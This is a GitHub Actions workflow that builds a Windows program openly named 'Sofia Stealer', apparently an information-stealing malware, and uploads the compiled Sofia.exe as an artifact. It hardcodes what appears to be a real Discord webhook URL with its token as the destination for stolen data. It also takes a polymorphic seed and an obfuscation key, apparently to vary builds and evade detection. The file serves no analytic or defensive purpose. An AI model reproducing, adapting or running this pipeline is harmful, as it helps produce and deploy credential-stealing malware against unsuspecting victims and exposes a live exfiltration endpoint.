name: sofia builder

on:
  push:
    branches: [ "main", "master" ]
  pull_request:
    branches: [ "main", "master" ]
  workflow_dispatch:
    inputs:
      webhook_url:
        description: 'Sofia Webhook URL'
        required: true
        default: 'https://discord.com/api/webhooks/1499616167470301296/f-Zh5QvIFv61_bmYzEj-ze7lDeOiuhmDHG7oFz7Z_tHcIw8yJqVNusB7-F4YXCLZu210'
      poly_seed:
        description: 'Polymorphic Seed (Optional)'
        required: false
      obfs_key:
        description: 'Obfuscation Key (Optional)'
        required: false


jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v4

    - name: Setup MSVC
      uses: ilammy/msvc-dev-cmd@v1

    - name: Build Sofia Stealer
      shell: cmd
      env:
        SOFIA_WEBHOOK_URL: ${{ github.event.inputs.webhook_url || 'https://discord.com/api/webhooks/1499616167470301296/f-Zh5QvIFv61_bmYzEj-ze7lDeOiuhmDHG7oFz7Z_tHcIw8yJqVNusB7-F4YXCLZu210' }}
        SOFIA_SEED: ${{ github.event.inputs.poly_seed }}
        SOFIA_KEY: ${{ github.event.inputs.obfs_key }}
      run: |
        dir
        call .\build.bat release

    - name: Upload Artifact
      uses: actions/upload-artifact@v4
      with:
        name: Sofia-Stealer-Build
        path: Sofia.exe
